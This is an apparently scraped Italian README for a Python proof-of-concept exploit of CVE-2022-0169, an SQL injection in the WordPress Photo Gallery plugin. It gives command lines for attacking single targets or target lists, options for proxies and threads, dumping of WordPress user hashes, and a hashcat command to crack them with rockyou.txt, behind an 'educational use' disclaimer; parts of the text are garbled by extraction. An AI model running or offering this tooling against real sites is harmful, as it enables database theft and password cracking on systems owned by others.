
CVE-2022-0169 - WordPress Photo Gallery SQLi PoC
Questo è un semplice proof-of-concept (PoC) in Python per CVE-2022-0169, una vulnerabilità di SQL injection nel plugin WordPress Photo Gallery.
admin-ajax.phpwp_usersQuesto strumento è solo per scopi educativi. Usalo responsabilmente! Come ascolteresti questo.. 😆
python3 exploit.py -u http://target.com
python3 exploit.py -f targets.txt
Esempio:
python3 exploit.py -u http://victim.com -w /usr/share/wordlists/rockyou.txt
Requisiti
requests
argparse
colorama
results/YYYYMMDD_HHMMSS/Quando vengono trovati hash, ti verrà chiesto:
Crack the hashes with hashcat now? [Y/N]:
Se premi Y, hashcat verrà eseguito automaticamente usando la wordlist selezionata.
results/ per dump e hash.hashcat -m 400 -a 0 results/YYYYMMDD_HHMMSS/hashes.txt /usr/share/wordlists/rockyou.txt
Questo strumento è solo per test educativi e autorizzati. Sei l'unico responsabile di come lo usi. Ottieni sempre il permesso prima di scansionare o sfruttare qualsiasi sistema.
Resta cyberpunk.
— X3RX3S
| Opzione | Descrizione |
|---|
-u | URL del singolo target |
-f | File con elenco di target |
-p | Proxy (es., http://127.0.0.1:8080) |
-t | Numero di thread (default: 5) |
-w | Scegli wordlist per hashcat (default: rockyou.txt) Assicurati che rockyou.txt sia decompresso (gunzip)! |